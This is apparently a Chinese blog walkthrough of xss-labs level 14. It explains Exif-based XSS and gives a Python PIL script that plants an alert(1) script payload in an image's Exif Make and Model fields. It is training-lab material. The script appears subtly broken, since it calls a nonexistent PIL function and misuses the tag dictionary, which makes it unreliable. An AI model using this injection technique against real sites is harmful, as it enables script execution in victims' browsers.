姿势
逻辑后端代码:
该题涉及exif xss
exif xss
Exif XSS 是一种安全漏洞,存在于图片的 Exif(Exchangeable Image File Format)数据中。
Exif 数据是嵌入在数字图像文件中的元数据,包含有关图像的信息,如拍摄日期、相机型号、GPS 坐标等。浏览器和其他应用程序通常会解析和显示这些数据。
当存在 Exif XSS 时,攻击者可以在图像的 Exif 数据中插入恶意的 JavaScript 代码。当用户加载带有恶意 Exif 数据的图像时,浏览器或其他应用程序可能会错误地解析恶意代码,并在受害者的浏览器上执行它。
脚本如下:
import PIL.ExifTags as ExifTags from PIL import Image # 打开图像文件 image = Image.open('初始.jpg') # 获取图像的 Exif 数据 exif_data = image._getexif() # 将 Exif 数据转为可修改的字典格式 exif_dict = dict(exif_data) # 修改 Exif 数据 exif_dict[ExifTags.TAGS['Make']] = 'xss语句' exif_dict[ExifTags.TAGS['Model']] = 'xss语句' # 将修改后的 Exif 数据重新写回图像 exif_bytes = ExifTags.exif_dict_to_bytes(exif_dict) image.save('改后.jpg', exif=exif_bytes)
先修改iframe标签:
接着使用脚本修改图像数据,xss语句为:
<script>alert(1)</script>
再上传图片:
回显如下:
总结
以上为[网络安全]xss-labs level-14 解题详析,后续将分享[网络安全]xss-labs level-15 解题详析。
我是秋说,我们下次见。